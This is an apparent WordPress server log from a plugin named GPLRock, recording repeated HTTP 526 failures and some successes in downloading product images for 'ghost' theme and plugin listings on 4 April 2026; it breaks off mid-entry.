apicona-health-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:23:58 UTC] GPLRock WARNING: Image download failed for product apicona-health-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/apicona---health--medical-wordpress-theme-28749.webp [04-Apr-2026 08:23:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: apicona-health-medical-wordpress-theme [04-Apr-2026 08:23:58 UTC] GPLRock: Image download failed for product autosmart-automotive-car-dealer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:00 UTC] GPLRock: Image download failed for product autosmart-automotive-car-dealer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autosmart---automotive-car-dealer-wordpress-theme-22563.webp for product autosmart-automotive-car-dealer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:02 UTC] GPLRock: Image download failed for product autosmart-automotive-car-dealer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:04 UTC] GPLRock: Image download failed for product autosmart-automotive-car-dealer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autosmart---automotive-car-dealer-wordpress-theme-22563.webp for product autosmart-automotive-car-dealer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:07 UTC] GPLRock WARNING: Image download failed for product autosmart-automotive-car-dealer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/autosmart---automotive-car-dealer-wordpress-theme-22563.webp [04-Apr-2026 08:24:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autosmart-automotive-car-dealer-wordpress-theme [04-Apr-2026 08:24:07 UTC] GPLRock: Image download failed for product rh-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:09 UTC] GPLRock: Image download failed for product rh-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rh---real-estate-wordpress-theme-18236.webp for product rh-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:11 UTC] GPLRock: Image download failed for product rh-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:13 UTC] GPLRock: Image download failed for product rh-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rh---real-estate-wordpress-theme-18236.webp for product rh-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:15 UTC] GPLRock WARNING: Image download failed for product rh-real-estate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rh---real-estate-wordpress-theme-18236.webp [04-Apr-2026 08:24:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rh-real-estate-wordpress-theme [04-Apr-2026 08:24:15 UTC] GPLRock: Image download failed for product grandpoza-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:17 UTC] GPLRock: Image download failed for product grandpoza-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grandpoza---construction-wordpress-theme-25796.webp for product grandpoza-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:20 UTC] GPLRock: Image download failed for product grandpoza-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:22 UTC] GPLRock: Image download failed for product grandpoza-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grandpoza---construction-wordpress-theme-25796.webp for product grandpoza-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:24 UTC] GPLRock WARNING: Image download failed for product grandpoza-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/grandpoza---construction-wordpress-theme-25796.webp [04-Apr-2026 08:24:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grandpoza-construction-wordpress-theme [04-Apr-2026 08:24:24 UTC] GPLRock: Image download failed for product droow-creative-showcase-portfolio-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:26 UTC] GPLRock: Image download failed for product droow-creative-showcase-portfolio-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/droow---creative-showcase-portfolio-template-10241.webp for product droow-creative-showcase-portfolio-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:28 UTC] GPLRock: Image download failed for product droow-creative-showcase-portfolio-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:30 UTC] GPLRock: Image download failed for product droow-creative-showcase-portfolio-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/droow---creative-showcase-portfolio-template-10241.webp for product droow-creative-showcase-portfolio-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:33 UTC] GPLRock WARNING: Image download failed for product droow-creative-showcase-portfolio-template. URL: https://meldwp.com/wp-content/uploads/droow---creative-showcase-portfolio-template-10241.webp [04-Apr-2026 08:24:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: droow-creative-showcase-portfolio-template [04-Apr-2026 08:24:33 UTC] GPLRock: Image download failed for product kals-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:35 UTC] GPLRock: Image download failed for product kals-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kals---portfolio-wordpress-theme-29502.webp for product kals-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:37 UTC] GPLRock: Image download failed for product kals-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:39 UTC] GPLRock: Image download failed for product kals-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kals---portfolio-wordpress-theme-29502.webp for product kals-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:41 UTC] GPLRock WARNING: Image download failed for product kals-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kals---portfolio-wordpress-theme-29502.webp [04-Apr-2026 08:24:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kals-portfolio-wordpress-theme [04-Apr-2026 08:24:41 UTC] GPLRock: Image download failed for product numbat-pet-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:43 UTC] GPLRock: Image download failed for product numbat-pet-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/numbat---pet-shop-woocommerce-wordpress-theme-7064.webp for product numbat-pet-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:46 UTC] GPLRock: Image download failed for product numbat-pet-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:48 UTC] GPLRock: Image download failed for product numbat-pet-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/numbat---pet-shop-woocommerce-wordpress-theme-7064.webp for product numbat-pet-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:50 UTC] GPLRock WARNING: Image download failed for product numbat-pet-shop-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/numbat---pet-shop-woocommerce-wordpress-theme-7064.webp [04-Apr-2026 08:24:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: numbat-pet-shop-woocommerce-wordpress-theme [04-Apr-2026 08:24:50 UTC] GPLRock: Image download failed for product communityjunction-buddypress-membership-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:52 UTC] GPLRock: Image download failed for product communityjunction-buddypress-membership-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/communityjunction---buddypress-membership-theme-15423.webp for product communityjunction-buddypress-membership-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:54 UTC] GPLRock: Image download failed for product communityjunction-buddypress-membership-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:57 UTC] GPLRock: Image download failed for product communityjunction-buddypress-membership-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:24:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/communityjunction---buddypress-membership-theme-15423.webp for product communityjunction-buddypress-membership-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:24:59 UTC] GPLRock WARNING: Image download failed for product communityjunction-buddypress-membership-theme. URL: https://meldwp.com/wp-content/uploads/communityjunction---buddypress-membership-theme-15423.webp [04-Apr-2026 08:24:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: communityjunction-buddypress-membership-theme [04-Apr-2026 08:24:59 UTC] GPLRock: Image download failed for product adeline-photography-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:25:01 UTC] GPLRock: Image download failed for product adeline-photography-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:25:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adeline---photography-portfolio-theme-24417.webp for product adeline-photography-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:25:03 UTC] GPLRock: Image download failed for product adeline-photography-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:25:05 UTC] GPLRock: Image download failed for product adeline-photography-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:25:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adeline---photography-portfolio-theme-24417.webp for product adeline-photography-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:25:07 UTC] GPLRock WARNING: Image download failed for product adeline-photography-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/adeline---photography-portfolio-theme-24417.webp [04-Apr-2026 08:25:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adeline-photography-portfolio-theme [04-Apr-2026 08:31:23 UTC] GPLRock: Image downloaded successfully for product forstron-legal-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f2ad51cc.jpg [04-Apr-2026 08:31:24 UTC] GPLRock: Using pre-downloaded image for product forstron-legal-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f2ad51cc.jpg [04-Apr-2026 08:31:24 UTC] GPLRock: Ghost product published with image - Product ID: forstron-legal-business-wordpress-theme [04-Apr-2026 08:31:25 UTC] GPLRock: Image downloaded successfully for product woocommerce-wholesale-pricing (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ee05937.jpg [04-Apr-2026 08:31:25 UTC] GPLRock: Using pre-downloaded image for product woocommerce-wholesale-pricing: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ee05937.jpg [04-Apr-2026 08:31:25 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-wholesale-pricing [04-Apr-2026 08:31:27 UTC] GPLRock: Image downloaded successfully for product mp3-sticky-player-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-958f730a.jpg [04-Apr-2026 08:31:27 UTC] GPLRock: Using pre-downloaded image for product mp3-sticky-player-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-958f730a.jpg [04-Apr-2026 08:31:27 UTC] GPLRock: Ghost product published with image - Product ID: mp3-sticky-player-wordpress-plugin [04-Apr-2026 08:31:29 UTC] GPLRock: Image downloaded successfully for product massive-dynamic-wordpress-website-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-58d6c669.jpg [04-Apr-2026 08:31:29 UTC] GPLRock: Using pre-downloaded image for product massive-dynamic-wordpress-website-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-58d6c669.jpg [04-Apr-2026 08:31:29 UTC] GPLRock: Ghost product published with image - Product ID: massive-dynamic-wordpress-website-builder [04-Apr-2026 08:31:30 UTC] GPLRock: Image downloaded successfully for product wordpress-advanced-database-cleaner-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5be6ba6b.jpg [04-Apr-2026 08:31:30 UTC] GPLRock: Using pre-downloaded image for product wordpress-advanced-database-cleaner-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5be6ba6b.jpg [04-Apr-2026 08:31:30 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-advanced-database-cleaner-premium [04-Apr-2026 08:31:32 UTC] GPLRock: Image downloaded successfully for product woocomposer-page-builder-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-70434801.jpg [04-Apr-2026 08:31:32 UTC] GPLRock: Using pre-downloaded image for product woocomposer-page-builder-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-70434801.jpg [04-Apr-2026 08:31:32 UTC] GPLRock: Ghost product published with image - Product ID: woocomposer-page-builder-for-woocommerce [04-Apr-2026 08:31:34 UTC] GPLRock: Image downloaded successfully for product dream-spa-salon-spa-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca5ebda8.jpg [04-Apr-2026 08:31:34 UTC] GPLRock: Using pre-downloaded image for product dream-spa-salon-spa-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca5ebda8.jpg [04-Apr-2026 08:31:34 UTC] GPLRock: Ghost product published with image - Product ID: dream-spa-salon-spa-wordpress-theme [04-Apr-2026 08:31:36 UTC] GPLRock: Image downloaded successfully for product storefront-mega-menus (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-519b0ce6.jpg [04-Apr-2026 08:31:36 UTC] GPLRock: Using pre-downloaded image for product storefront-mega-menus: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-519b0ce6.jpg [04-Apr-2026 08:31:36 UTC] GPLRock: Ghost product published with image - Product ID: storefront-mega-menus [04-Apr-2026 08:31:37 UTC] GPLRock: Image downloaded successfully for product woocommerce-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-26bc7130.jpg [04-Apr-2026 08:31:37 UTC] GPLRock: Using pre-downloaded image for product woocommerce-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-26bc7130.jpg [04-Apr-2026 08:31:37 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-page-builder [04-Apr-2026 08:31:39 UTC] GPLRock: Image downloaded successfully for product jarida-responsive-wordpress-news-magazine-blog (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8963c2c1.jpg [04-Apr-2026 08:31:39 UTC] GPLRock: Using pre-downloaded image for product jarida-responsive-wordpress-news-magazine-blog: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8963c2c1.jpg [04-Apr-2026 08:31:39 UTC] GPLRock: Ghost product published with image - Product ID: jarida-responsive-wordpress-news-magazine-blog [04-Apr-2026 08:32:22 UTC] GPLRock: Image download failed for product gravitizer-gravity-forms-material-ui-styler (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:24 UTC] GPLRock: Image download failed for product gravitizer-gravity-forms-material-ui-styler (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravitizer---gravity-forms-material-ui-styler-5790.webp for product gravitizer-gravity-forms-material-ui-styler after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:32:27 UTC] GPLRock: Image download failed for product gravitizer-gravity-forms-material-ui-styler (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:29 UTC] GPLRock: Image download failed for product gravitizer-gravity-forms-material-ui-styler (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravitizer---gravity-forms-material-ui-styler-5790.webp for product gravitizer-gravity-forms-material-ui-styler after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:32:31 UTC] GPLRock WARNING: Image download failed for product gravitizer-gravity-forms-material-ui-styler. URL: https://meldwp.com/wp-content/uploads/gravitizer---gravity-forms-material-ui-styler-5790.webp [04-Apr-2026 08:32:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gravitizer-gravity-forms-material-ui-styler [04-Apr-2026 08:32:31 UTC] GPLRock: Image download failed for product mighty-url-shortener-short-url-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:33 UTC] GPLRock: Image download failed for product mighty-url-shortener-short-url-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mighty-url-shortener--short-url-script-14942.webp for product mighty-url-shortener-short-url-script after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:32:35 UTC] GPLRock: Image download failed for product mighty-url-shortener-short-url-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:37 UTC] GPLRock: Image download failed for product mighty-url-shortener-short-url-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mighty-url-shortener--short-url-script-14942.webp for product mighty-url-shortener-short-url-script after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:32:39 UTC] GPLRock WARNING: Image download failed for product mighty-url-shortener-short-url-script. URL: https://meldwp.com/wp-content/uploads/mighty-url-shortener--short-url-script-14942.webp [04-Apr-2026 08:32:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mighty-url-shortener-short-url-script [04-Apr-2026 08:32:40 UTC] GPLRock: Image download failed for product product-condition-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:42 UTC] GPLRock: Image download failed for product product-condition-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/product-condition-for-woocommerce-7076.webp for product product-condition-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:32:44 UTC] GPLRock: Image download failed for product product-condition-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:46 UTC] GPLRock: Image download failed for product product-condition-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/product-condition-for-woocommerce-7076.webp for product product-condition-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:32:48 UTC] GPLRock WARNING: Image download failed for product product-condition-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/product-condition-for-woocommerce-7076.webp [04-Apr-2026 08:32:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: product-condition-for-woocommerce [04-Apr-2026 08:32:48 UTC] GPLRock: Image downloaded successfully for product algori-pdf-viewer-pro-for-wordpress-gutenberg (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae2a6b63.webp [04-Apr-2026 08:32:48 UTC] GPLRock: Using pre-downloaded image for product algori-pdf-viewer-pro-for-wordpress-gutenberg: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ae2a6b63.webp [04-Apr-2026 08:32:48 UTC] GPLRock: Ghost product published with image - Product ID: algori-pdf-viewer-pro-for-wordpress-gutenberg [04-Apr-2026 08:32:48 UTC] GPLRock: Image download failed for product woocommerce-shop-as-customer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:50 UTC] GPLRock: Image download failed for product woocommerce-shop-as-customer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-shop-as-customer-25496.webp for product woocommerce-shop-as-customer after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:32:53 UTC] GPLRock: Image download failed for product woocommerce-shop-as-customer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:55 UTC] GPLRock: Image download failed for product woocommerce-shop-as-customer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-shop-as-customer-25496.webp for product woocommerce-shop-as-customer after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:32:57 UTC] GPLRock WARNING: Image download failed for product woocommerce-shop-as-customer. URL: https://meldwp.com/wp-content/uploads/woocommerce-shop-as-customer-25496.webp [04-Apr-2026 08:32:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-shop-as-customer [04-Apr-2026 08:32:57 UTC] GPLRock: Image download failed for product floating-cart-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:32:59 UTC] GPLRock: Image download failed for product floating-cart-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/floating-cart-for-woocommerce-16232.webp for product floating-cart-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:33:01 UTC] GPLRock: Image download failed for product floating-cart-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:03 UTC] GPLRock: Image download failed for product floating-cart-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/floating-cart-for-woocommerce-16232.webp for product floating-cart-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:33:05 UTC] GPLRock WARNING: Image download failed for product floating-cart-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/floating-cart-for-woocommerce-16232.webp [04-Apr-2026 08:33:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: floating-cart-for-woocommerce [04-Apr-2026 08:33:06 UTC] GPLRock: Image download failed for product wiloke-highlight-featured-products-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:08 UTC] GPLRock: Image download failed for product wiloke-highlight-featured-products-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-highlight-featured-products-for-elementor-27262.webp for product wiloke-highlight-featured-products-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:33:10 UTC] GPLRock: Image download failed for product wiloke-highlight-featured-products-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:12 UTC] GPLRock: Image download failed for product wiloke-highlight-featured-products-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wiloke-highlight-featured-products-for-elementor-27262.webp for product wiloke-highlight-featured-products-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:33:14 UTC] GPLRock WARNING: Image download failed for product wiloke-highlight-featured-products-for-elementor. URL: https://meldwp.com/wp-content/uploads/wiloke-highlight-featured-products-for-elementor-27262.webp [04-Apr-2026 08:33:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wiloke-highlight-featured-products-for-elementor [04-Apr-2026 08:33:14 UTC] GPLRock: Image download failed for product struninn-elementor-plugins-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:16 UTC] GPLRock: Image download failed for product struninn-elementor-plugins-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/struninn---elementor-plugins-bundle-28032.webp for product struninn-elementor-plugins-bundle after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:33:19 UTC] GPLRock: Image download failed for product struninn-elementor-plugins-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:21 UTC] GPLRock: Image download failed for product struninn-elementor-plugins-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/struninn---elementor-plugins-bundle-28032.webp for product struninn-elementor-plugins-bundle after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:33:23 UTC] GPLRock WARNING: Image download failed for product struninn-elementor-plugins-bundle. URL: https://meldwp.com/wp-content/uploads/struninn---elementor-plugins-bundle-28032.webp [04-Apr-2026 08:33:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: struninn-elementor-plugins-bundle [04-Apr-2026 08:33:23 UTC] GPLRock: Image download failed for product ticketomatic-automatic-post-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:25 UTC] GPLRock: Image download failed for product ticketomatic-automatic-post-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ticketomatic-automatic-post-generator-plugin-for-wordpress-1724.webp for product ticketomatic-automatic-post-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:33:27 UTC] GPLRock: Image download failed for product ticketomatic-automatic-post-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:30 UTC] GPLRock: Image download failed for product ticketomatic-automatic-post-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ticketomatic-automatic-post-generator-plugin-for-wordpress-1724.webp for product ticketomatic-automatic-post-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:33:32 UTC] GPLRock WARNING: Image download failed for product ticketomatic-automatic-post-generator-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/ticketomatic-automatic-post-generator-plugin-for-wordpress-1724.webp [04-Apr-2026 08:33:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ticketomatic-automatic-post-generator-plugin-for-wordpress [04-Apr-2026 08:33:32 UTC] GPLRock: Image download failed for product time-tracking-and-activity-reporting-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:34 UTC] GPLRock: Image download failed for product time-tracking-and-activity-reporting-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:33:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/time-tracking-and-activity-reporting-wordpress-plugin-18845.webp for product time-tracking-and-activity-reporting-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:33:36 UTC] GPLRock: Image download failed for product time-tracking-and-activity-reporting-wordpress-plugin (attempt 